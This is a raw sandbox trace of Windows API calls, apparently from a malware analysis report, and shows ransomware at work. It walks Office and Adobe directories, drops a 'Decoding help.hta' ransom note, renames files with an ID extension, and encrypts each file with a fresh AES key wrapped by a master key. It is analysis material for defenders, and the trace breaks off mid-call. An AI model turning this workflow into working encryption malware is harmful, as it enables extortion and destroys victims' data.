GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\decoding help.hta")) returned 0x1 [0058.513] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OSPPOBJS.DLL") returned -1 [0058.513] lstrlenW (lpString="OSPPOBJS.DLL") returned 12 [0058.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*" [0058.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*.*") returned 87 [0058.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\", lpString2="OSPPOBJS.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" [0058.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" [0058.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.514] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e0 [0058.514] CreateFileMappingA (hFile=0x5e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0058.514] CryptAcquireContextA (in: phProv=0x146dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x146dfcec*=0x2aac6cc0) returned 1 [0060.228] CryptGenKey (in: hProv=0x2aac6cc0, Algid=0x6610, dwFlags=0x1, phKey=0x146dfce8 | out: phKey=0x146dfce8*=0x10f14480) returned 1 [0060.228] CryptExportKey (in: hKey=0x10f14480, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x146dfbe4, pdwDataLen=0x146dfce4 | out: pbData=0x146dfbe4*, pdwDataLen=0x146dfce4*=0x2c) returned 1 [0060.229] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x14e60000 Thread: id = 292 os_tid = 0xc0 [0043.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*", lpFindFileData=0x1481fd30 | out: lpFindFileData=0x1481fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da2b8 [0043.843] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.843] FindNextFileW (in: hFindFile=0x5da2b8, lpFindFileData=0x1481fd30 | out: lpFindFileData=0x1481fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.843] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.843] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.843] FindNextFileW (in: hFindFile=0x5da2b8, lpFindFileData=0x1481fd30 | out: lpFindFileData=0x1481fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d0e00, ftCreationTime.dwHighDateTime=0x1ca2cea, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa07d0e00, ftLastWriteTime.dwHighDateTime=0x1ca2cea, nFileSizeHigh=0x0, nFileSizeLow=0x90540, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSLID.DLL", cAlternateFileName="")) returned 1 [0043.843] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0043.844] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned 60 [0043.844] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" [0043.844] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\decoding help.hta")) returned 0xffffffff [0043.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0043.846] WriteFile (in: hFile=0x460, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1481fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1481fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.847] CloseHandle (hObject=0x460) returned 1 [0043.847] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.847] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSLID.DLL") returned -1 [0043.847] lstrlenW (lpString="MSLID.DLL") returned 9 [0043.847] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0043.847] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned 60 [0043.847] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\", lpString2="MSLID.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" [0043.847] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" [0043.847] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0043.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mslid.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0043.852] CreateFileMappingA (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x458 [0043.853] CryptAcquireContextA (in: phProv=0x1481fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1481fcec*=0x3449b50) returned 1 [0043.853] CryptGenKey (in: hProv=0x3449b50, Algid=0x6610, dwFlags=0x1, phKey=0x1481fce8 | out: phKey=0x1481fce8*=0x5da3b8) returned 1 [0043.853] CryptExportKey (in: hKey=0x5da3b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1481fbe4, pdwDataLen=0x1481fce4 | out: pbData=0x1481fbe4*, pdwDataLen=0x1481fce4*=0x2c) returned 1 [0043.853] MapViewOfFile (hFileMappingObject=0x458, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x90540) returned 0x3990000 [0044.199] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1481fbe4*, pdwDataLen=0x1481fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1481fbe4*, pdwDataLen=0x1481fcf8*=0x100) returned 1 [0044.199] CryptEncrypt (in: hKey=0x5da3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3990000, pdwDataLen=0x1481fce4*=0x90540, dwBufLen=0x90540 | out: pbData=0x3990000*, pdwDataLen=0x1481fce4*=0x90540) returned 1 [0044.904] UnmapViewOfFile (lpBaseAddress=0x3990000) returned 1 [0044.911] CloseHandle (hObject=0x458) returned 1 [0044.911] CryptDestroyKey (hKey=0x5da3b8) returned 1 [0044.911] CryptReleaseContext (hProv=0x3449b50, dwFlags=0x0) returned 1 [0044.911] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.912] WriteFile (in: hFile=0x460, lpBuffer=0x1481fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1481fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1481fbe4*, lpNumberOfBytesWritten=0x1481fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.397] WriteFile (in: hFile=0x460, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1481fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1481fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.397] CloseHandle (hObject=0x460) returned 1 [0045.411] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSLID.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.411] FindNextFileW (in: hFindFile=0x5da2b8, lpFindFileData=0x1481fd30 | out: lpFindFileData=0x1481fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x782b2c00, ftCreationTime.dwHighDateTime=0x1bada3f, ftLastAccessTime.dwLowDateTime=0x98a53b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x782b2c00, ftLastWriteTime.dwHighDateTime=0x1bada3f, nFileSizeHigh=0x0, nFileSizeLow=0x6c67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSWDS_EN.LEX", cAlternateFileName="")) returned 1 [0048.476] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0048.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned 60 [0048.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" [0048.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\decoding help.hta")) returned 0x1 [0048.476] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSWDS_EN.LEX") returned -1 [0048.477] lstrlenW (lpString="MSWDS_EN.LEX") returned 12 [0048.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0048.477] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned 60 [0048.477] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\", lpString2="MSWDS_EN.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" [0048.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" [0048.477] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.[ID]g9uZrLhJaygpwRm1[ID]" [0048.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0051.171] CreateFileMappingA (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2b8 [0051.171] CryptAcquireContextA (in: phProv=0x1481fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1481fcec*=0x34494f0) returned 1 [0054.720] CryptGenKey (in: hProv=0x34494f0, Algid=0x6610, dwFlags=0x1, phKey=0x1481fce8 | out: phKey=0x1481fce8*=0x5a5e30) returned 1 [0054.720] CryptExportKey (in: hKey=0x5a5e30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1481fbe4, pdwDataLen=0x1481fce4 | out: pbData=0x1481fbe4*, pdwDataLen=0x1481fce4*=0x2c) returned 1 [0054.720] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c660) returned 0x68d0000 [0054.728] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1481fbe4*, pdwDataLen=0x1481fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1481fbe4*, pdwDataLen=0x1481fcf8*=0x100) returned 1 [0054.729] CryptEncrypt (in: hKey=0x5a5e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x68d0000, pdwDataLen=0x1481fce4*=0x6c660, dwBufLen=0x6c660 | out: pbData=0x68d0000*, pdwDataLen=0x1481fce4*=0x6c660) returned 1 [0054.817] UnmapViewOfFile (lpBaseAddress=0x68d0000) returned 1 [0054.823] CloseHandle (hObject=0x2b8) returned 1 [0054.823] CryptDestroyKey (hKey=0x5a5e30) returned 1 [0054.823] CryptReleaseContext (hProv=0x34494f0, dwFlags=0x0) returned 1 [0054.823] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.823] WriteFile (in: hFile=0x448, lpBuffer=0x1481fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1481fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1481fbe4*, lpNumberOfBytesWritten=0x1481fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.940] WriteFile (in: hFile=0x448, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1481fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1481fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.940] CloseHandle (hObject=0x448) returned 1 [0056.940] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.478] FindNextFileW (in: hFindFile=0x5da2b8, lpFindFileData=0x1481fd30 | out: lpFindFileData=0x1481fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e2ea00, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x5b0da70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe5e2ea00, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x60983, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSWDS_ES.LEX", cAlternateFileName="")) returned 1 [0058.478] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0058.478] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned 60 [0058.478] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" [0058.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\decoding help.hta")) returned 0x1 [0058.479] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSWDS_ES.LEX") returned -1 [0058.479] lstrlenW (lpString="MSWDS_ES.LEX") returned 12 [0058.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*" [0058.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*.*") returned 60 [0058.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\", lpString2="MSWDS_ES.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" [0058.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" [0058.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.[ID]g9uZrLhJaygpwRm1[ID]" [0058.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe10 [0061.615] CreateFileMappingA (hFile=0xe10, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe14 [0061.615] CryptAcquireContextA (phProv=0x1481fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 293 os_tid = 0x6fc [0042.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5b8 [0042.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.337] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.337] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.337] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.337] FindNextFileW (in: hFindFile=0x5db5b8, lpFindFileData=0x1495fd30 | out: lpFindFileData=0x1495fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0042.337] lstrcmpW (lpString1=".", lpString2="Replicate") returned -1 [0042.337] lstrcmpW (lpString1="..", lpString2="Replicate") returned -1 [0042.337] lstrcmpiW (lpString1="windows", lpString2="Replicate") returned 1 [0042.337] lstrcatW (in: lpString1="", 